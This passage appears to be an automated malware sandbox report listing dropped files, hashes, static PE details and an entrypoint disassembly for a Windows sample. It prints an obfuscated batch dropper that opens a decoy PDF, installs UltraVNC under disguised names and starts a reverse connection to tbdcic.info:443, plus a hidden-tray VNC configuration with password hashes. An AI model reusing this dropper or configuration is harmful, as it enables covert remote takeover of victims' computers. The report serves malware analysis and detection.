Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\ba93f130-c48e-4045-9654-019802be1b3f.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
MD5:	A0CFC77914D9BFBDD8BC1B1154A7B364
SHA1:	54962BFDF3797C95DC2A4C8B29E873743811AD30
SHA-256:	81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
SHA-512:	74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\c874d06f-3330-4948-89d6-2297ffe51e79.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\d9792996-f5b3-488c-86fb-1c70896eed06.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
MD5:	CA6B0D9F8DDC295DACE8157B69CA7CF6
SHA1:	6299B4A49AB28786E7BF75E1481D8011E6022AF4
SHA-256:	A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7
SHA-512:	9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\Downloads\Lom.pdf

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Windows\Tasks\0271695705143540

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.595995239629694
Encrypted:	false
SSDEEP:	24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
MD5:	38910F2D879725612BA1097E1F825C1E
SHA1:	99F3C92122A6B333F94304DEED7D55D140BD9456
SHA-256:	6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
SHA-512:	BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim

C:\Windows\Tasks\0271695705143540.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.595995239629694
Encrypted:	false
SSDEEP:	24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
MD5:	38910F2D879725612BA1097E1F825C1E
SHA1:	99F3C92122A6B333F94304DEED7D55D140BD9456
SHA-256:	6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
SHA-512:	BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim

C:\Windows\Tasks\Nfe70s.UFVVkM

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Windows\Tasks\UltraVNC.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.216893826927931
Encrypted:	false
SSDEEP:	24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
MD5:	7EB58E0D2316B8ECE029C804BF4BA8FA
SHA1:	A2A8E2518D12A53CCFCAB925C124933172044D08
SHA-256:	71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
SHA-512:	3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

C:\Windows\Tasks\WPSela.LSZr7V

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\WPSela.LSZr7V, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Windows\Tasks\conhost.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Windows\Tasks\id2rlx.MxYNRd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Windows\Tasks\sync_browser.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Windows\Tasks\wFUH4p.aEmode

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.216893826927931
Encrypted:	false
SSDEEP:	24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
MD5:	7EB58E0D2316B8ECE029C804BF4BA8FA
SHA1:	A2A8E2518D12A53CCFCAB925C124933172044D08
SHA-256:	71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
SHA-512:	3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.952472042394955
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	7q551ugrWe.exe
File size:	1'664'495 bytes
MD5:	d61940626fad051067bfd16f2ab4e657
SHA1:	cceaeda73fca724016bac0c9cb000fcd4ca1e523
SHA256:	c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4
SHA512:	ca97c277acda035354e904e72dd9ab52547eec12f42cd3de5acd075e4af9785a807dfacfdfb65ffd43d88ee31eabc28d572a83d0599701fe7a1aa36bbd09f869
SSDEEP:	24576:WKWs4sgeV+OkCbkE/ClHrI3phRLFry+IVGjZP7gzF77/voe2D7UGxxy+vJy:TFFV+SbkE/yHkPRd4iazZoe2DNm
TLSH:	A1752351B6D3D8F4DA57227111B1AD132F63DD2A164128CF738DFA067A30683F92BA72
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................

File Icon


Icon Hash:	357561d6dad24d55

Static PE Info

General

Entrypoint:	0x41382f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1d1577d864d2da06952f7affd8635371

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00416E98h
push 004139C0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004151DCh]
pop ecx
or dword ptr [0041B9E4h], FFFFFFFFh
or dword ptr [0041B9E8h], FFFFFFFFh
call dword ptr [004151E0h]
mov ecx, dword ptr [004199C4h]
mov dword ptr [eax], ecx
call dword ptr [004151E4h]
mov ecx, dword ptr [004199C0h]
mov dword ptr [eax], ecx
mov eax, dword ptr [004151E8h]
mov eax, dword ptr [eax]
mov dword ptr [0041B9E0h], eax
call 00007FE878D1EF52h
cmp dword ptr [00419780h], ebx
jne 00007FE878D1EE3Eh
push 004139B8h
call dword ptr [004151ECh]
pop ecx
call 00007FE878D1EF24h
push 00419050h
push 0041904Ch
call 00007FE878D1EF0Fh
mov eax, dword ptr [004199BCh]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [004199B8h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004151F4h]
push 00419048h
push 00419000h
call 00007FE878D1EEDCh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17324	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0x309f0	.rsrc
